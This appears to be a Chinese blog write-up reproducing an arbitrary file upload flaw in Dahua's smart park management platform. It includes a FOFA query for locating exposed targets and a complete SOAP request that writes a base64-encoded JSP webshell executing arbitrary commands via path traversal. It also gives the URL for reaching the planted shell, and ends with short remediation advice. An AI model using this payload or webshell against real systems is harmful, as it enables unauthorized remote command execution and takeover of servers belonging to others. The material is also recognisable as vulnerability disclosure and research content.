Advertisement

大华智慧园区综合管理平台 bitmap 任意文件上传漏洞复现

阅读量:

大华智慧园区综合管理平台存在任意文件上传漏洞,在/emap/webservice/gis/soap/bitmap接口处被恶意攻击者可上传后门文件并执行任意命令,控制服务器权限。该漏洞可通过POST /upload/rce.jsp进行复现验证,并已由官方修复(http://dahuatech.corp.dav01.com)。建议用户采取防火墙白名单策略限制访问,并非必要禁止公网访问该系统。

0x01 产品简介

大华智慧式园区综合管理平台是一款涵盖园区运营、资源调配以及智能化服务等多种功能的综合管理系统。该平台旨在优化园区资源配置,并借助智能化服务来提升用户体验的同时,满足多维度的管理要求。

0x02 漏洞概述

大华智慧园区综合管理平台配备了bitmap接口,在该接口处存在文件上传漏洞。当未获得授权时,攻击者能够上传带有后门的文件,并运行任意指令进而导致服务器权限被操控。

0x03 复现环境

FOFA:app="dahua-智慧园区综合管理平台"

0x04 漏洞复现

PoC

复制代码
 POST /emap/webservice/gis/soap/bitmap HTTP/1.1

    
 Host: your-ip
    
 Content-Type: text/xml; charset=utf-8
    
 User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36
    
  
    
 <soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:res="http://response.webservice.bitmap.mapbiz.emap.dahuatech.com/">
    
     <soapenv:Header/>           
    
 	    <soapenv:Body>
    
      		    <res:uploadPicFile>
    
                 <arg0>
    
          	    <picPath>/../rce.jsp</picPath>
    
                 </arg0>
    
                 <arg1>PCUgaWYoIjEyMyIuZXF1YWxzKHJlcXVlc3QuZ2V0UGFyYW1ldGVyKCJwd2QiKSkpeyBqYXZhLmlvLklucHV0U3RyZWFtIGluID0gUnVudGltZS5nZXRSdW50aW1lKCkuZXhlYyhyZXF1ZXN0LmdldFBhcmFtZXRlcigiY21kIikpLmdldElucHV0U3RyZWFtKCk7IGludCBhID0gLTE7IGJ5dGVbXSBiID0gbmV3IGJ5dGVbMjA0OF07IG91dC5wcmludCgiPHByZT4iKTsgd2hpbGUoKGE9aW4ucmVhZChiKSkhPS0xKXsgb3V0LnByaW50bG4obmV3IFN0cmluZyhiKSk7IH0gb3V0LnByaW50KCI8L3ByZT4iKTsgfSAlPg==</arg1>
    
             </res:uploadPicFile>
    
 		</soapenv:Body>
    
 </soapenv:Envelope>
    
    
    
    
    AI助手

PS:标签处为base64编码的马子

验证url

复制代码
    /upload/rce.jsp
    
    AI助手

RCE

0x05 修复建议

官方已采取措施修复该漏洞,请您建议用户联系厂商解决漏洞问题:http://dahuatech.corp.dav01.com

通过防火墙等安全设备设置访问策略,设置白名单访问。

如非必要,禁止公网访问该系统。

全部评论 (0)

还没有任何评论哟~